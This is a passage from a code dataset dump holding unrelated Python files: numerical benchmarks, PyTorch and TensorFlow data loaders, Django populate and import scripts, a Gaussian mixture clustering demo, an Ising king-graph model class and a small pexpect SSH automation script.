{}'.format(np.allclose(forloop_list_nested(), einsum())))\nprint('is equal = {}'.format(np.allclose(einsum_list2array(), einsum())))\n\nnumber = 1000\nprint(\"\\nProcessing speed:\")\nprint('einsum {:.9f}s'.format(timeit.timeit(\"einsum()\", setup=\"from __main__ import einsum\", number=number)))\nprint('cCode {:.9f}s'.format(timeit.timeit(\"cCode()\", setup=\"from __main__ import cCode\", number=number)))\nprint('dot_app {:.9f}s'.format(timeit.timeit(\"dot_app()\", setup=\"from __main__ import dot_app\", number=number)))\nprint('forloop {:.9f}s'.format(timeit.timeit(\"forloop()\", setup=\"from __main__ import forloop\", number=number)))\n# print('dot_simple {:.9f}s'.format(timeit.timeit(\"dot_simple()\", setup=\"from __main__ import dot_simple\", number=number)))\n# print('forloop_list {:.9f}s'.format(timeit.timeit(\"forloop_list()\", setup=\"from __main__ import forloop_list\", number=number)))\n# print('forloop_list_nested {:.9f}s'.format(timeit.timeit(\"forloop_list_nested()\", setup=\"from __main__ import forloop_list_nested\", number=number)))\n# print('einsum_list2array {:.9f}s'.format(timeit.timeit(\"einsum_list2array ()\", setup=\"from __main__ import einsum_list2array \", number=number)))\n\n\nindex = (np.random.randint(0, n - 1), np.random.randint(0, size - 1), np.random.randint(0, size - 1))\nindex = (0,0,0)\nprint('\\nTest element with index {}:'.format(index))\nprint(\"{:.15f}, {:.15f}\".format(forloop()[index], cCode()[index]))\nprint(\"{:.15f}, {:.15f}\".format(einsum()[index], dot_app()[index]))\n","sub_path":"tests/processing_speed/multiple_dot_products.py","file_name":"multiple_dot_products.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"632625020","text":"#!/usr/bin/python3\n\n\n\nfrom jk_flexdata import *\nfrom jk_infodatatree import DictValue\n\n\n\ndataTree = FlexObject({\n\t\"host_name\": \"test\"\n})\n\n\n\nspath, data = FlexDataSelector(\"|host_name\").getOne(dataTree)\nprint(repr(data))\n\nd = DictValue(data, None, None)\nd.dump()\n\n\n\n\n\n\n\n","sub_path":"testing/test_DictValue2.py","file_name":"test_DictValue2.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"415819191","text":"\ndef main():\n # Write your code below this line\n n = int(input('Enter triangle height: '))\n 
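# e.g. for n == 3 the loop below prints a right-aligned triangle:\n #   *\n #  **\n # ***\n 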
a=1\n sp= n - 1\n\n for i in range(a,n+1,1):\n print((' '* sp)+'*' * i)\n sp = sp - 1\n\nif __name__=='__main__':\n main()\n","sub_path":"assignments/25TrianguloAsteriscos/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539203319","text":"import glob\nimport torch\nimport numpy as np\nimport threading\nimport cv2\nimport time\nimport random\n\nfrom torchvision.utils import make_grid\nfrom torch.utils.data import IterableDataset, DataLoader\n\nfrom torch._six import queue, container_abcs, string_classes\nfrom torch.utils.data._utils.pin_memory import pin_memory\nfrom torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL\nfrom torch._utils import ExceptionWrapper\n\nfrom itertools import chain, cycle, islice\nfrom pytorch_streamloader.video_streamer import OpenCVStream\n\n\nclass MyIterableDataset(IterableDataset):\n def __init__(self, data_list, batch_size=4, tbins=5, max_frames_per_video=10):\n self.data_list = data_list\n self.batch_size = batch_size\n self.tbins = tbins\n self.max_frames_per_video = max_frames_per_video\n\n @property\n def shuffle_data_list(self):\n return random.sample(self.data_list, len(self.data_list))\n\n def process_data(self, data):\n stream = OpenCVStream(data, height=240, width=320, max_frames=self.max_frames_per_video)\n worker = torch.utils.data.get_worker_info()\n worker_id = worker.id if worker is not None else -1\n\n out = []\n for frame_num, x in enumerate(stream):\n ret, x = x\n if x is None:\n break\n out.append(x[None])\n if len(out) == self.tbins:\n y = np.concatenate(out)\n out = []\n yield y[:,None]\n\n def get_stream(self, data_list):\n print('number of files to stream: ', len(data_list))\n tmp = map(self.process_data, iter(data_list))\n out = chain.from_iterable(tmp)\n return out\n\n def __iter__(self):\n # here we should create equal partitions\n chunk_size = len(self.data_list) // self.batch_size \n return zip(\n *[self.get_stream(self.data_list[i*chunk_size:(i+1)*chunk_size]) for i in range(self.batch_size)]\n )\n \n # here it is just randomly sampled\n # return zip(\n # *[self.get_stream(self.shuffle_data_list) for _ in range(self.batch_size)]\n # )\n\n @classmethod\n def split_datasets(cls, data_list, batch_size, tbins, max_workers):\n for n in range(max_workers, 0, -1):\n if batch_size % n == 0:\n num_workers = n\n break\n #here we partition the original data_list.\n split_size = batch_size // num_workers\n num_files_per_worker = len(data_list) // num_workers\n out = []\n for i in range(num_workers):\n start = i * num_files_per_worker\n end = (i + 1) * num_files_per_worker\n stream_files = data_list[start:end]\n item = cls(stream_files, batch_size=split_size, tbins=tbins)\n out.append(item)\n return out\n\n\nclass MultiStreamDataLoader:\n def __init__(self, datasets, pin_memory=True):\n self.datasets = datasets\n self.pin_memory = pin_memory\n\n def get_stream_loaders(self):\n dataloaders = [\n DataLoader(dataset, num_workers=1, batch_size=None, pin_memory=True)\n for dataset in self.datasets\n ]\n return zip(*dataloaders)\n\n def join_streams_thread(self, out_queue, device_id, done_event):\n \"\"\"\n additional thread putting data into a queue to be collected from __iter__\n \"\"\"\n torch.set_num_threads(1)\n torch.cuda.set_device(device_id)\n\n for idx, batch_parts in enumerate(self.get_stream_loaders()):\n data = list(chain(*batch_parts))\n\n data = torch.cat([item[:, None] for item in data], 
dim=1)\n if (\n not done_event.is_set()\n and not isinstance(data, ExceptionWrapper)\n ):\n data = pin_memory(data)\n\n out_queue.put(data, timeout=MP_STATUS_CHECK_INTERVAL)\n\n self._join_memory_thread_done_event.set()\n\n def __iter__(self):\n # define a thread for collation & memory pinning here\n if self.pin_memory:\n self._join_memory_thread_done_event = threading.Event()\n self._data_queue = queue.Queue()\n self.join_memory_thread = threading.Thread(\n target=self.join_streams_thread,\n args=(\n self._data_queue,\n torch.cuda.current_device(),\n self._join_memory_thread_done_event,\n ),\n )\n self.join_memory_thread.daemon = True\n self.join_memory_thread.start()\n \n while not self._join_memory_thread_done_event.is_set():\n batch = self._data_queue.get(timeout=100000)\n batch = {'data':batch}\n yield batch\n self.join_memory_thread.join()\n else:\n # Single-Process\n for batch_parts in self.get_stream_loaders():\n data = list(chain(*batch_parts))\n batch = torch.cat([item[:, None] for item in data], dim=1)\n batch = {'data':batch}\n yield batch\n\n","sub_path":"pytorch_iterable.py","file_name":"pytorch_iterable.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"391820678","text":"import os \r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project_exercise.settings')\r\n\r\nimport django \r\ndjango.setup()\r\n\r\n# Faker Pop script \r\nimport random \r\nfrom users.models import User\r\nfrom faker import Faker\r\n\r\nfake_gen = Faker()\r\n\r\ndef add_user(N=5):\r\n for i in range(N):\r\n first_name= fake_gen.first_name()\r\n last_name = fake_gen.last_name()\r\n email = fake_gen.email()\r\n user = User.objects.get_or_create(first_name = first_name, last_name = last_name, email = email)[0]\r\n user.save()\r\n\r\nif __name__ == '__main__':\r\n print(\"Populating users .....\")\r\n add_user(20)\r\n print(\"populating completed!\")","sub_path":"Django-level-3/project_exercise/populate_users.py","file_name":"populate_users.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538808810","text":"import numpy as np\n\n\ndef one_hot_vec(index, size, reuse_vec=None):\n vec = reuse_vec if reuse_vec is not None else np.empty(size, dtype=float)\n vec.fill(0)\n vec[index] = 1\n return vec\n\n\ndef softmax(in_vec):\n exp = np.exp(in_vec)\n return exp / np.sum(exp)\n\n\ndef softmax_drv(in_vec):\n dim = len(in_vec)\n soft = softmax(in_vec)\n identity = np.identity(dim)\n jacob_mat = np.asmatrix(np.zeros(dim * dim)).reshape(dim, dim)\n for i in range(dim):\n soft_i = soft[i]\n for j in range(dim):\n ident = identity[i][j]\n soft_j = soft[j]\n drv = soft_i * (ident - soft_j)\n jacob_mat[i, j] = drv\n return jacob_mat\n\n\ndef softmax_slope(in_vec):\n dim = len(in_vec)\n soft = softmax(in_vec)\n delta = 0.001\n jacob_mat = np.asmatrix(np.zeros(dim * dim)).reshape(dim, dim)\n for i in range(dim):\n in_vec[i] += delta\n new_soft = softmax(in_vec)\n for j in range(dim):\n jacob_mat[i, j] = (new_soft[j] - soft[j]) / delta\n in_vec[i] -= delta\n return jacob_mat\n\n\ndef tanh(in_vec):\n return np.tanh(in_vec)\n\n\ndef tanh_drv(in_vec):\n return np.negative(np.square(np.tanh(in_vec))) + 1\n\n\ndef jacobian(in_vec, out_grads):\n dim = len(in_vec)\n in_mat = np.asmatrix(in_vec).reshape(dim, 1)\n grad_mat = np.asmatrix(out_grads).reshape(1, dim)\n return np.copy(np.dot(in_mat, grad_mat))\n\n\ndef 
from_jacobian(matrix):\n # sums matrix columns\n #\n # [ [ 0, 1, 2]\n # [ 3, 4, 5] --> [9, 12, 15]\n # [ 6, 7, 8] ] \n #\n # np.matrix stays two-dimensional through np.sum and .flatten(), which is\n # why the rank never dropped; np.asarray converts to a true 1-D ndarray\n\n return np.asarray(np.sum(matrix, axis=0)).flatten()\n\n\n","sub_path":"src/numpy_rnn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"474186144","text":"import tensorflow as tf\nimport os\nimport collections\nfrom six.moves import cPickle\nimport numpy as np\n\n\nclass TextLoader():\n def __init__(self, session, data_dir, batch_size, seq_length, encoding='utf-8'):\n self.session = session\n self.data_dir = data_dir\n self.batch_size = batch_size\n self.seq_length = seq_length\n self.encoding = encoding\n\n input_file = os.path.join(data_dir, \"input.txt\")\n vocab_file = os.path.join(data_dir, \"vocab.pkl\")\n tensor_file = os.path.join(data_dir, \"data.npy\")\n\n # the leading \"True or\" deliberately forces re-preprocessing on every run\n if True or not (os.path.exists(vocab_file) and os.path.exists(tensor_file)):\n print(\"reading text file\")\n self.preprocess(input_file, vocab_file, tensor_file)\n else:\n print(\"loading preprocessed files\")\n self.load_preprocessed(vocab_file, tensor_file)\n\n self.create_batches()\n self.reset_batch_pointer()\n\n def preprocess(self, input_file, vocab_file, tensor_file):\n line_data = tf.data.TextLineDataset([input_file])\n\n chars_data = line_data\\\n .map(lambda l: tf.string_split([l], '').values)\n\n next_char_list = chars_data.make_one_shot_iterator().get_next()\n counter = collections.Counter()\n\n megacharlist = []\n\n while True:\n try:\n next_chars = self.session.run(next_char_list)\n counter.update(next_chars)\n\n # hack?\n megacharlist.extend(next_chars)\n megacharlist.append('\\n')\n counter['\\n'] += 1 # hack?\n\n except tf.errors.OutOfRangeError:\n break # done\n\n count_pairs = sorted(counter.items(), key=lambda x: -x[1])\n self.chars, _ = zip(*count_pairs)\n self.vocab_size = len(self.chars)\n self.vocab = dict(zip(self.chars, range(len(self.chars))))\n\n self.input_dataset = chars_data\n\n # hack: still using concatenated tensor format\n self.tensor = np.array(list(map(self.vocab.get, megacharlist))) # list() matters on Python 3, where map is a lazy iterator\n\n def load_preprocessed(self, vocab_file, tensor_file):\n with open(vocab_file, 'rb') as f:\n self.chars = cPickle.load(f)\n self.vocab_size = len(self.chars)\n self.vocab = dict(zip(self.chars, range(len(self.chars))))\n self.tensor = np.load(tensor_file)\n self.num_batches = int(self.tensor.size / (self.batch_size *\n self.seq_length))\n\n def create_batches(self):\n self.num_batches = int(self.tensor.size / (self.batch_size *\n self.seq_length))\n\n # When the data (tensor) is too small,\n # let's give them a better error message\n if self.num_batches == 0:\n assert False, \"Not enough data. Make seq_length and batch_size small.\"\n\n 
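# worked example of the batching arithmetic below: with tensor.size == 25,\n # batch_size == 2 and seq_length == 3, num_batches == 4 and only the first\n # 4 * 2 * 3 == 24 characters are kept\n 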
self.tensor = self.tensor[:self.num_batches * self.batch_size * self.seq_length]\n xdata = self.tensor\n ydata = np.copy(self.tensor)\n ydata[:-1] = xdata[1:]\n ydata[-1] = xdata[0]\n self.x_batches = np.split(xdata.reshape(self.batch_size, -1),\n self.num_batches, 1)\n self.y_batches = np.split(ydata.reshape(self.batch_size, -1),\n self.num_batches, 1)\n\n def next_batch(self):\n x, y = self.x_batches[self.pointer], self.y_batches[self.pointer]\n self.pointer += 1\n return x, y\n\n def reset_batch_pointer(self):\n self.pointer = 0\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"447208325","text":"\"\"\"\ntask 63, CKE problem set (zbiór zadań CKE)\n\"\"\"\n\n\ndef dwucykliczny(n):\n if len(n) % 2 != 0:\n return False\n p = int(len(n) / 2)\n if n[:p] == n[p:]:\n return True\n return False\n\n\ndef nie_kolo_siebie(n):\n ok = True\n i = 0\n while i < len(n) - 1:\n if n[i] == \"1\" and n[i+1] == \"1\":\n ok = False\n break\n i += 1\n return ok\n\n\ndef rozklad(n):\n czynniki = []\n k = 2\n while n != 1:\n while n % k == 0:\n n //= k\n czynniki.append(k)\n k += 1\n return czynniki\n\n\ntablica1 = []\nlicznik2 = 0\nlicznik3 = 0\nmin3 = 262143\nmax3 = 0\nwith open(\"ciagi.txt\", \"r\") as plik:\n for L in plik:\n L = L.strip()\n # 63.1\n if dwucykliczny(L):\n tablica1.append(L)\n # 63.2\n if nie_kolo_siebie(L):\n licznik2 += 1\n # 63.3\n l_dzies = int(L, 2)\n if len(rozklad(l_dzies)) == 2:\n licznik3 += 1\n if l_dzies < min3:\n min3 = l_dzies\n if l_dzies > max3:\n max3 = l_dzies\n\nwith open(\"wyniki_ciagi.txt\", \"w\") as odp:\n odp.write(\"63.1\\n\")\n for C in tablica1:\n odp.write(C + \"\\n\")\n odp.write(\"\\n63.2\\n\" + str(licznik2))\n odp.write(\"\\n\\n63.3\\n\" + \"Number of semiprimes: \" + str(licznik3) + \"\\n\" +\n \"Smallest: \" + str(min3) + \"\\n\" +\n \"Largest: \" + str(max3))","sub_path":"Programowanie/63 - zrobione/zadanie63.py","file_name":"zadanie63.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"421977125","text":"from SuffixBorderArray import SuffixBorderArray\n\ndef SuffixBorderArrayModified(s):\n bp = SuffixBorderArray(s)\n n = len(s)\n bpm = [0 for i in range(n)]\n bpm[n - 1] = bp[n - 1]\n for i in range(0, n - 1):\n if bp[i] and s[bp[i]] == s[i + 1]:\n bpm[i] = bpm[bp[i] - 1]\n else:\n bpm[i] = bp[i]\n print('Modified border array:', bpm)\n return bpm\n\n\nif __name__ == \"__main__\":\n # Test\n # s = ABAAABAСBСAABAAAB\n print(\"Modified suffix border array:\", SuffixBorderArrayModified(s = input('String: ')))","sub_path":"algorythms/SuffixBorderArrayModified.py","file_name":"SuffixBorderArrayModified.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"360592067","text":"#!/usr/bin/env python\n\n\n# test.py\n\n# Copyright (C) 2014 Santosh Thoduka\n\n# This software may be modified and distributed under the terms\n# of the MIT license. 
See the LICENSE file for details.\n\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom ego_flow import EgomotionFlow\nfrom motion_flow import MotionFlow\nfrom trajectory_flow import TrajectoryFlow\nfrom fit_subspace import get_fit_error\n\nheight = 240\nwidth = 320\nstep = 10 \n\nmf = MotionFlow()\nef = EgomotionFlow()\nmf.length = 8.0\nef.length = 4.0 \n\nplt.ylim([0,height])\nplt.xlim([0,width])\n\n\ndx, dy = ef.get_right_trans(width, height, step)\nmx, my = mf.get_move_down(width, height, 100, 100, 50, 50, step)\nnx, ny = mf.get_move_down(width, height, 210, 200, 20, 20, step)\n\ndx = dx + mx + nx\ndy = dy + my + ny\n\n\nfor i in xrange(dx.shape[0]):\n for j in xrange(dx.shape[1]):\n if dx[i,j] != 0.0 or dy[i,j] != 0.0:\n plt.arrow(i, j, dx[i,j], dy[i,j], head_width=3.0, head_length=0.8, fc='k', ec='k')\n\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"Simulated optical flow vectors\")\nplt.show(block=False)\n\nplt.figure()\ntf = TrajectoryFlow()\ntraj = tf.create_trajectory(dx,dy,10)\nnp.savetxt('test.out', traj, fmt='%.4f', delimiter=',')\ntraj = np.loadtxt(\"test.out\", dtype=np.float64, delimiter=',')\ntrajcopy = traj.copy()\nresiduals, index = get_fit_error(trajcopy, 1)\nplt.plot(residuals)\nplt.xlabel(\"Trajectory index\")\nplt.ylabel(\"Residual\")\nplt.title(\"Subspace fit residual\")\nplt.show(block=False)\n\n\n\nplt.figure()\nplt.ylim([0,height])\nplt.xlim([0,width])\n#plt.gca().set_color_cycle(['#1B9E77', '#D95F02', '#7570B3', '#E7298A', '#66A61E', '#E6AB02', '#A6761D', '#666666'])\nplt.gca().set_color_cycle(['k', 'k', 'k', 'k', 'k', 'k', 'k','k'])\nfor idx, t in enumerate(traj):\n if idx in index:\n x = t[::2]\n y = t[1::2]\n d = np.vstack((x,y))\n d = d.T\n plt.plot(d[:,0], d[:,1],linewidth=2.0)\nplt.title(\"Trajectories used to define the subspace\")\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.show(block=False)\n\nplt.figure()\nplt.ylim([0,height])\nplt.xlim([0,width])\n\nfor idx,r in enumerate(residuals):\n if r > 0.00002:\n plt.scatter(traj[idx,-4], traj[idx,-3])\n\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"Outlier points\")\nplt.show()\n","sub_path":"synthetic_flow/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360103206","text":"import simulation\nimport network\nimport power_distribution\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport nodes\nfrom matplotlib import cm\nimport background_visualisation\nimport node_visualisation_interpreters\nimport edge_visualisation_interpreters\nimport visualisation\nhardGenNetwork = network.Network(network.SimpleHardcodedNetworkGenerator())\ncS = simulation.coreSimulation(hardGenNetwork)\ncS.aYearInTheLife()\n\ncon1 = cS.network.consumerAgents[0]\ncon2 = cS.network.consumerAgents[1]\ncon3 = cS.network.consumerAgents[2]\n\nsupplierAgent = cS.network.supplierAgents[0]\n\nsup1 = cS.network.suppliers[0]\nsup2 = cS.network.suppliers[1]\n\n\nnw_final=cS.network\n\nfig, axes = plt.subplots(2,2)\n\n'''\nConsumers: Satisfaction, Power, Social\n'''\n\n\nbg1 = background_visualisation.Background()\n#bg2 = background_visualisation.interpBackground(cmap=cm.Accent)\n#bg2.delunay_data(ranGenNetwork.consumers,'neighbourhood_id')\nni1= node_visualisation_interpreters.node_interpreter(radius=50,node_type=nodes.Supplier,color='red', transparency=0.5)\nni2= node_visualisation_interpreters.node_interpreter(radius=15,node_type=nodes.Distributor,color='purple')\nni3= 
node_visualisation_interpreters.node_interpreter(radius=25,node_type=nodes.Consumer,color='green')\nni4= node_visualisation_interpreters.node_scale_color('guaranteed_capacity',node_type=nodes.Consumer,radius=40,min_val=0,max_val=6000,cmap=cm.autumn)\nei1 = edge_visualisation_interpreters.edge_interpreter(thickness=3,color='gray')\n\ngrid1 = visualisation.networkPane(nw_final,[ei1],[ni1,ni2,ni3],None,0,0)\ngrid2 = visualisation.historyPane(nw_final,1,0,'consumers','consumer_agent','memSoc')\ngrid3 = visualisation.networkPane(nw_final,[ei1],[ni4],None,1,1)\ngrid4 = visualisation.historyPane(nw_final,0,1,'consumers','consumer_agent','memory')\ngrid5 = visualisation.historyPane(nw_final,0,2,'consumers','consumer_agent','memPow')\ngrid6 = visualisation.historyPane(nw_final,1,2,'consumers','consumer_agent','memPowReq')\ngrid7 = visualisation.historyPane(nw_final,2,2,'consumers','consumer_agent','memPowUsed')\n\nvis= visualisation.Visualisation(grid1,grid2,grid3,grid4,grid5,grid6,grid7)\n\nvis.update()\n","sub_path":"power_grid/TestCases.py","file_name":"TestCases.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582857232","text":"\n# import the Gaussian mixture model implementation\n# (sklearn.mixture.GMM was removed from scikit-learn; GaussianMixture is its replacement)\nfrom sklearn.mixture import GaussianMixture\n\ndef load_data(file_name):\n import numpy as np\n f = open(file_name,'r')\n data = f.readlines()\n f.close()\n feature_list = []\n for line in data:\n tmp = line.split('\\t')\n # cast to float so the feature array is numeric rather than strings\n feature_list.append([float(tmp[0]), float(tmp[1])])\n features = np.array(feature_list)\n print(\"Shape: %s\"%str(features.shape))\n return features\n\nsample = load_data(r'Restaurant_Data_Beijing.txt')\n\n\n# set the parameters required by the mixture model\ngmm = GaussianMixture(n_components=4, covariance_type='tied')\nresult = gmm.fit_predict(sample)\n# get the center coordinates of each cluster\ncenter = gmm.means_\n\n\ndef result_show(features, labels, centers, K=2):\n from matplotlib import pyplot as plt\n color_list = ['ob','oy','oc','om','or','og','ok','sb','sy','sc','sm','sr','sg']\n x = []\n y = []\n for i in range(K+1):\n x.append([])\n y.append([])\n for i in range(len(features)):\n x[labels[i]].append(features[i,0])\n y[labels[i]].append(features[i,1])\n for j in range(len(centers)):\n x[K].append(centers[j,0])\n y[K].append(centers[j,1])\n for i in range(len(x)):\n plt.plot(x[i],y[i],color_list[i])\n plt.show()\n return\n# call the visualization function\nresult_show(sample, result, center,4)\n","sub_path":"lab_codes/gmm.py","file_name":"gmm.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"301002132","text":"# Copyright 2019 Jij Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .model import BinaryQuadraticModel\n\nclass KingGraph(BinaryQuadraticModel):\n \"\"\"\n BQM for the king graph of the HITACHI CMOS Annealer\n Attributes\n ---------\n xrange : list of int\n hardware (CMOS) restriction on the x coordinate: [xmin, xmax]\n yrange : list of int\n hardware (CMOS) restriction on the y coordinate: 
[ymin, ymax]\n prange : list of int\n hardware (CMOS) restriction on the interaction strength 'p': [pmin, pmax]\n king_graph : list of list of int\n Annealing Cloud Web API format representation of the interaction coefficients\n Quadratic term [x1, y1, x2, y2, value]\n Linear term [x1, y1, x1, y1, value]\n \"\"\"\n def __init__(self, machine_type, h=None, J=None, Q=None, king_graph=None, var_type='SPIN'):\n \"\"\"\n The constructor reformats the interactions into the Web API format (Ising king graph)\n and validates that every interaction fits on the king graph.\n Parameters\n ----------\n machine_type : str\n choose 'ASIC' or 'FPGA'\n king_graph : list of list\n represents an Ising or QUBO interaction.\n Each spin is identified by its 2-D coordinates (x, y).\n Quadratic term [x1, y1, x2, y2, value]\n Linear term [x1, y1, x1, y1, value]\n \"\"\"\n # set parameter ranges\n self.machine_type = machine_type\n if self.machine_type == \"ASIC\":\n self.xrange = [0, 351+1]\n self.yrange = [0, 175+1]\n self.prange = [-3, 3]\n elif self.machine_type == \"FPGA\":\n self.xrange = [0, 79+1]\n self.yrange = [0, 79+1]\n self.prange = [-127, 127]\n else:\n raise ValueError('machine type should be ASIC or FPGA')\n\n # convert h, J, Q to the expected format and initialize the BQM\n if king_graph is not None:\n h, J, Q = self._convert_to_BQM_format(king_graph, var_type)\n super().__init__(h=h, J=J, Q=Q, var_type=var_type)\n\n # reformat to ising king graph (which is Web API format)\n if king_graph is not None and var_type == \"SPIN\":\n self._ising_king_graph = king_graph\n elif var_type == \"SPIN\":\n self._ising_king_graph = []\n for index, h in self.linear.items():\n x, y = self._convert_to_xy(index)\n self._ising_king_graph.append([x, y, x, y, h])\n for (i, j), J in self.quad.items():\n x1, y1 = self._convert_to_xy(i)\n x2, y2 = self._convert_to_xy(j)\n self._ising_king_graph.append([x1, y1, x2, y2, J])\n else:\n ising_int = self.ising_interactions()\n sys_size = len(ising_int)\n self._ising_king_graph = []\n for i in range(sys_size):\n for j in range(i, sys_size):\n if ising_int[i][j] == 0:\n continue\n x1, y1 = self._convert_to_xy(self.indices[i])\n x2, y2 = self._convert_to_xy(self.indices[j])\n self._ising_king_graph.append([x1, y1, x2, y2, ising_int[i][j]])\n\n self._validation_ising_king_graph()\n \n def _convert_to_BQM_format(self, king_graph, var_type):\n h, J, Q = None, None, None\n if var_type == \"SPIN\":\n h, J = {}, {}\n for x1, y1, x2, y2, value in king_graph:\n if (x1, y1) == (x2, y2):\n h[(x1, y1)] = value\n else:\n J[(x1, y1), (x2, y2)] = value\n else: # qubo\n Q = {((x1, y1), (x2, y2)): value for x1, y1, x2, y2, value in king_graph}\n return h, J, Q\n\n def get_ising_king_graph(self):\n return self._ising_king_graph\n \n def king_indices(self):\n if isinstance(self.indices[0], tuple):\n return self.indices\n else:\n return [self._convert_to_xy(i) for i in self.indices]\n \n def _convert_to_xy(self, index):\n if isinstance(index, tuple):\n return index[0], index[1]\n else:\n y = int(index / self.xrange[1])\n return int(index - y * self.xrange[1]), y\n \n def convert_to_index(self, x, y):\n return y * self.xrange[1] + x\n \n def _validation_ising_king_graph(self):\n for xi, yi, xj, yj, p in self._ising_king_graph:\n if yi >= self.yrange[1] or yj >= self.yrange[1]:\n raise ValueError('Graph is incomplete xi: {}, yi: {}, xj: {}, yj: {}, p:{}'\n .format(xi, yi, xj, yj, p))\n if not (xi in [xj, xj-1, xj+1]) or not (yi in [yj, yj-1, yj+1]):\n raise ValueError('Graph is incomplete xi: {}, yi: {}, xj: {}, yj: {}, p:{}'\n .format(xi, yi, xj, yj, 
p))\n if not (self.prange[0] <= p <= self.prange[1]):\n raise ValueError('Graph is incomplete xi: {}, yi: {}, xj: {}, yj: {}, p: {}'\n .format(xi, yi, xj, yj, p))\n \n \n def convert_ising(self):\n interactions = {(x + y*self.xrange[1], xn + yn*self.xrange[1]): p for x, y, xn, yn, p in self._ising_king_graph}\n return interactions","sub_path":"openjij/model/king_graph.py","file_name":"king_graph.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"59255709","text":"# utf-8\n# exercise 84\n\npessoas = list()\ncadastro = list()\npeso = list()\nnome = list()\nn = m = 0\nwhile True:\n pessoas.append(str(input('Nome: ')))\n pessoas.append(float(input('Peso: ')))\n cadastro.append(pessoas[:])\n pessoas.clear()\n resp = str(input('Deseja continuar [S/N]: ')).upper().strip()[0]\n if resp != 'S':\n break\nprint('-=' * 30)\nfor p in cadastro:\n nome.append(p[0])\n peso.append(p[1])\nprint(f'Ao todo, você cadastrou {len(cadastro)}.')\nprint(f'O maior peso foi de {max(peso):.2f} kg. Peso de ', end='')\nfor x in peso:\n if max(peso) == peso[n]:\n print(nome[n], end=' ')\n n += 1\nprint(f'\\nO menor peso foi de {min(peso):.2f} kg. Peso de ', end='')\nfor y in peso:\n if min(peso) == peso[m]:\n print(nome[m], end=' ')\n m += 1","sub_path":"Ex0084/ex0084.py","file_name":"ex0084.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640579899","text":"from pexpect import pxssh\nimport getpass\ntry:\n s = pxssh.pxssh()\n # hostname = input('hostname:')\n # username = input('username')\n # password = getpass.getpass('password')\n s.login('localhost', 'lxw', 'lxw')\n print(\"login\")\n s.sendline('uptime') # run a command\n s.prompt() # match the prompt\n print(s.before.decode()) # print everything before the prompt.\n s.sendline('ls -l')\n s.prompt()\n print(s.before.decode())\n s.sendline('touch abc')\n s.prompt()\n print(s.before.decode())\n s.sendline('df')\n s.prompt()\n print(s.before.decode())\n s.logout()\nexcept pxssh.ExceptionPxssh as e:\n print(\"pxssh failed on login.\")\n print(e)","sub_path":"ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"557037993","text":"from django.core.management.base import BaseCommand, CommandError\nfrom albums.models import Artist, PrimaryGenre, SubGenre, Rating, Album, AlbumSubgenre\n\nimport csv\nimport datetime as dt\n\nclass Command(BaseCommand):\n help = 'Reads in data from the old albums list.'\n\n def handle(self, *args, **options):\n file = \"OldAlbums.csv\"\n with open(file, mode='r', encoding='utf-8') as csvfile:\n csv_reader = csv.DictReader(csvfile, delimiter=',')\n \n all_artists = []\n all_genres = []\n all_subgenres = []\n\n for row in csv_reader:\n all_artists.append(row['Artist'])\n all_genres.append(row['Primary Genre'])\n all_subgenres.append(row['Specific Genre'])\n \n all_subgenres = split_subgenres(list(set(all_subgenres)))\n\n unique_artists = list(set(all_artists))\n unique_genres = list(set(all_genres))\n unique_subgenres = list(set(all_subgenres))\n\n save_objects(unique_artists, Artist)\n save_objects(unique_genres, PrimaryGenre)\n save_objects(unique_subgenres, SubGenre)\n\n clean_up()\n\n with open(file, 